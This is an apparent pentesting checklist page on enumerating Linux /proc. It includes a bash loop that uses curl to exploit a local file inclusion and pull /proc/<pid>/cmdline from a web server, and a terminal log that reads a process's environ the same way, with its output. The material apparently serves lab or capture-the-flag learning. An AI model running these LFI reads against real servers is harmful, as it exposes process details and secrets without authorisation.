Enumerating /proc

For reverse engineering

Devicename	Content
`/proc/$pid/maps`	Shows the mempory mapping of a process. Includes all used libraries.
`/proc/self/loginuid`	Own UID.

Read processes

If you can read /proc via a LFI:

#!/bin/bash

for i in {1..1024}
do
	echo $i
	curl http://10.10.11.154/index.php\?page=/proc/$i/cmdline --output /tmp/proc/$i
done

The, look in the /tmp/proc directory for files > 0 byte.

Read environment of a process:

┌──(root💀imac2019-kali)-[~/p151.general.1/t117/enum]
└─# curl http://10.10.11.154/index.php\?page=/proc/425/environ --output /tmp/f                                                   23 ⨯
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   194    0   194    0     0   3500      0 --:--:-- --:--:-- --:--:--  3527

┌──(root💀imac2019-kali)-[~/p151.general.1/t117/enum]
└─# cat /tmp/f
LANG=C.UTF-8PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binHOME=/var/wwwLOGNAME=www-dataUSER=www-dataINVOCATION_ID=fe8f7fff3b4541928b90a35e1dc0ed5bJOURNAL_STREAM=8:10138

External ressources

See https://idafchev.github.io/enumeration/2018/03/05/linux_proc_enum.html

For reverse engineering

Read processes

External ressources

Leave a Reply Cancel reply

About

Checklists

Categories

Checklists: Ports